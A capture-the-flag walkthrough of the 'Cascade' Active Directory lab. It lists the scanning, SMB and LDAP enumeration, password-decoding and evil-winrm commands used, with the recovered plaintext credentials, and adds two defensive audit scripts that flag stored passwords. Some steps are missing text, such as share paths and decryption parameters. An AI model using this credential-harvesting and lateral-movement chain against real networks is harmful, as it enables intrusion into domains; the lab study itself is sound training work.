The article provides a step-by-step guide to port scanning, LDAP interaction, password decryption, and recovery of deleted objects. The material is useful for information security professionals who want to improve their pentesting and vulnerability research skills in corporate networks.
We add the machine's IP address to /etc/hosts under the name cascade.htb.
First, a scan of open ports is performed. Since scanning all ports with nmap takes a long time, masscan is used for the initial stage. The scan covers all TCP and UDP ports via the tun0 interface at a rate of 500 packets per second.
masscan -e tun0 -p1-65535,U:1-65535 --rate=500
There are many ports open on the host. Now let’s scan them with nmap to filter and select the ones we need.
nmap cascade.htb -p49172,49157,49154,135,53,5985,636,389,139,49155,445,3269,3268,49158,88
Now, to get more detailed information about the services running on the ports, let’s run the scan with the -A option.
nmap -A cascade.htb -p49172,49157,49154,135,53,5985,636,389,139,49155,445,3269,3268,49158,88
First of all, we start with enum4linux enumeration of SMB.
enum4linux -a cascade.htb
We note the list of users and their group memberships. Let’s see what LDAP has to offer.
We use JXplorer to work with LDAP. Let’s connect and see all the objects.
For user Ryan Thompson, we find the cascadeLegacyPwd attribute.
We decode the base64 and get the password.
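The attribute found above is the kind of thing a domain audit should catch before an attacker does: a custom attribute, readable by any authenticated user, holding a base64-encoded password. The script below is an added example (not from the original writeup) that walks an LDIF export such as one produced by ldapsearch, folds continuation lines, decodes `::` base64 values, and reports every attribute whose name looks credential-like. The LDIF fragment is constructed for the example; the base64 value is the writeup's own password encoded here for the sample.

```python
import base64
import re

# Constructed LDIF fragment modelled on the entry described in the writeup.
# 'attr:: value' is the LDIF form for base64 data; the value below decodes to
# the page's recovered password and is embedded here only as sample input.
SAMPLE_LDIF = """\
dn: CN=Ryan Thompson,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: r.thompson
cascadeLegacyPwd:: clk0bjVldmE=
description: Legacy account

dn: CN=Steve Smith,OU=Users,OU=UK,DC=cascade,DC=local
objectClass: user
sAMAccountName: s.smith
memberOf: CN=Audit Share,OU=Groups,OU=UK,DC=cascade,DC=local
"""

# Attribute names that suggest a credential was stashed in a custom attribute.
SUSPECT_NAME = re.compile(r"(pwd|pass|secret|cred)", re.IGNORECASE)


def parse_ldif(text):
    """Return one dict per LDIF entry: {attribute: [(value, was_base64), ...]}.

    Handles both value forms, 'attr: value' (plain) and 'attr:: value'
    (base64, decoded to text here), and folds RFC 2849 continuation lines
    (a line starting with a single space) back into the preceding value.
    """
    entries, current = [], None
    folded = re.sub(r"\n ", "", text)
    for line in folded.splitlines():
        if not line.strip():
            # Blank line terminates an entry.
            if current:
                entries.append(current)
                current = None
            continue
        if line.startswith("#"):
            continue
        name, _sep, raw = line.partition(":")
        if raw.startswith(":"):
            # 'attr:: <base64>' form
            value = base64.b64decode(raw[1:].strip()).decode("utf-8", "replace")
            encoded = True
        else:
            value = raw.strip()
            encoded = False
        if current is None:
            current = {}
        current.setdefault(name, []).append((value, encoded))
    if current:
        entries.append(current)
    return entries


def find_legacy_password_attributes(text):
    """Return (dn, attribute, decoded_value) for every credential-like
    attribute in the export, i.e. every secret readable to whoever ran it."""
    hits = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", [("?", False)])[0][0]
        for attr, values in entry.items():
            if attr == "dn" or not SUSPECT_NAME.search(attr):
                continue
            for value, _encoded in values:
                hits.append((dn, attr, value))
    return hits


if __name__ == "__main__":
    for dn, attr, value in find_legacy_password_attributes(SAMPLE_LDIF):
        print(f"{dn}: {attr} = {value!r}")
```

Run it against a real export with the account of an ordinary domain user: anything it reports is readable by every user in the domain, which is exactly the exposure this writeup exploits. Remediation is to remove the attribute values and rotate the passwords, not to restrict read access to the attribute.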
Once you have the credentials, you can check the available SMB resources using CrackMapExec.
cme smb cascade.htb -u "r.thompson" -p "rY4n5eva" --shares
Let’s connect to the Data resource.
smbclient -U r.thompson //
We list the share recursively.
Now you should download these files and view their contents.
get "IT\Email Archives\Meeting_Notes_June_2018.html"
get "IT\Logs\Ark AD Recycle Bin\ArkAdRecycleBin.log"
get "IT\Logs\DCs\dcdiag.log"
get "IT\Temp\s.smith\VNC Install.reg"
The first file talks about network migration and that the TempAdmin password is the same as the regular administrator password.
From the second file, we will note the rights of the ArkSvc user.
There is nothing interesting in the third file. But in the fourth we find the VNC password for the user s.smith.
The password is decoded using vncpasswd. To do this, you need to specify the -d parameter (decode password) and pass it in Hex form.
vncpasswd.py -d -H 6bcf2a4b6e5aca0f
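A .reg export left on a file share is a credential leak whenever it carries a stored password, and VNC's obfuscation does not change that, as the decode step above shows. The script below is an added example (not from the original writeup) of the check a share audit can run: it parses .reg syntax, joins hex continuation lines, and reports every value whose name looks like a password, returning the bytes as a normalized hex string. The registry export is constructed for the example and modelled on the `VNC Install.reg` file described above; the Password bytes are the hex value the writeup decodes.

```python
import re

# Constructed .reg export modelled on the VNC install file found on the share.
# Real exports are UTF-16LE with a BOM: open them with encoding="utf-16".
SAMPLE_REG = """\
Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SOFTWARE\\TightVNC\\Server]
"ExtraPorts"=""
"QueryTimeout"=dword:0000001e
"Password"=hex:6b,cf,2a,4b,6e,5a,ca,0f
"UseVncAuthentication"=dword:00000001

[HKEY_LOCAL_MACHINE\\SOFTWARE\\Example\\Unrelated]
"Comment"="nothing to see"
"ControlPassword"=hex:01,02,03,\\
  04,05,06,07,08
"""

# Value names that indicate a stored credential (hypothetical audit pattern).
SECRET_NAME = re.compile(r"(pass|pwd|secret)", re.IGNORECASE)


def parse_reg(text):
    """Yield (key_path, value_name, kind, value) for each value in a .reg file.

    kind is 'hex' (value: lowercase hex string with commas removed),
    'dword' (value: int) or 'string' (value: str). Hex data wrapped across
    lines with a trailing backslash is joined before parsing.
    """
    joined = re.sub(r"\\\r?\n\s*", "", text)
    key = None
    for line in joined.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            continue
        m = re.match(r'^"(?P<name>[^"]*)"=(?P<data>.*)$', line)
        if not m or key is None:
            continue
        name, data = m.group("name"), m.group("data")
        if data.startswith("hex"):
            # Covers both 'hex:' and typed 'hex(N):' forms.
            raw = data.split(":", 1)[1]
            yield key, name, "hex", raw.replace(",", "").strip().lower()
        elif data.startswith("dword:"):
            yield key, name, "dword", int(data[6:], 16)
        else:
            yield key, name, "string", data.strip('"')


def find_stored_secrets(text):
    """Return (key_path, value_name, kind, value) for every value whose name
    matches SECRET_NAME, regardless of how the data is encoded."""
    return [(k, n, kind, v) for k, n, kind, v in parse_reg(text)
            if SECRET_NAME.search(n)]


if __name__ == "__main__":
    for key, name, kind, value in find_stored_secrets(SAMPLE_REG):
        print(f"[{key}] {name} ({kind}): {value}")
```

The script deliberately stops at flagging the value rather than reversing it: for the audit the hex bytes are already the finding, because VNC's stored form is reversible by anyone who reads the file. Apply the same check to .reg, .txt and script files found on shares, and to exported registry hives in backups.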
evil-winrm -i cascade.htb -u s.smith -p sT333ve2
Let’s look at the SMB resources of this user:
cme smb cascade.htb -u s.smith -p sT333ve2 --shares
The Audit$ share is available.
smbclient -U s.smith //$
We’ll download everything we have.
Among the downloaded files is a database; opening it reveals credentials in its LDAP table.
We decompile the program using dnSpy and find the section of code where the password is read from the database and passed to the decryption function. The same call also passes the key needed to decrypt the password.
By decompiling the library, we learn about the encryption mode and initialization vector.
So, we have the following parameters:
Now you need to decrypt the password. To do this, you can use the CyberChef tool, which allows you to perform the necessary operations online.
Once the password is obtained, we can see from the enum4linux results that this user belongs to the Remote Management Users and AD Recycle Bin groups. As the ArkAdRecycleBin.log showed earlier, this account was used for moving objects.
In addition, the TempAdmin user had the same password as the administrator, but his account was deleted.
Now let’s check the deleted objects in the Active Directory Recycle Bin for the possibility of recovering the account or retrieving further data.
Get-ADObject -IncludeDeletedObjects -Filter {IsDeleted -eq $True}
We find the desired object in the Active Directory Recycle Bin. Now we get its attributes for further analysis and possible account recovery.
Get-ADObject -Filter {SamAccountName -eq 'TempAdmin'} -IncludeDeletedObjects -Properties *
We decode the password from the returned attributes.
Let’s connect to WinRM and pick up the flag.
evil-winrm -i cascade.htb -u Administrator -p baCT3r1aN00dles
The article examines the process of gaining access to a system through vulnerabilities and subsequent privilege escalation. Special attention is paid to password decryption using CascCrypto.dll and tools such as CyberChef. The final stage was the study of deleted objects in the Active Directory Recycle Bin to restore access.